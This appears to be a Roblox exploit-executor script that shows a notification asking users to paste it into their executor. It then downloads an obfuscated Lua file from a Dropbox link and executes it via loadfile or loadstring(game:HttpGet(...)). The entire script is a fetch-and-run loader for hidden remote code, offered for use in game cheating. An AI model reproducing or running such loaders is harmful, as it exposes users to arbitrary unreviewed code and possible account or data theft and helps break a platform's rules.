local StarterGui = game:GetService("StarterGui") pcall(function() StarterGui:SetCore("SendNotification", { Title = "From Unlikely_Human", Text = "Hey, if you see this, please copy then paste in your executor, dont put it in loadstring", Duration = math.huge, Button1 = "I Understand" }) end) --Please dont put it in loadstring, maybe bug-- --Thank @White_Hat and more.. for the create folder and folder check script-- local a="https://ucd55e9de509925b56bc144cb539.dl.dropboxusercontent.com/cd/0/inline/C9hA6-4pM0Lj6RxfxdL5qtmtWBP2A-cS13-mT9USalBuatNw41BFMr-Yx4PUYfOGbeYOi3BTy58e008yvtUjrO-NyG4mxbTWsxlcMWQeGlBmP4pqu0QO3iMx9DKdOjV0ooUlXYGLOl5oY_CMMj9ftj5d/file#"if makefolder or writefile then if not isfolder("Unlikely_Human")then makefolder("Unlikely_Human")end;if not isfolder("Unlikely_Human/Asset")then makefolder("Unlikely_Human/Asset")end;writefile("Unlikely_Human/Asset/Obfuscated.lua",game:HttpGet(a))loadfile("Unlikely_Human/Asset/Obfuscated.lua")()else loadstring(game:HttpGet(a))()end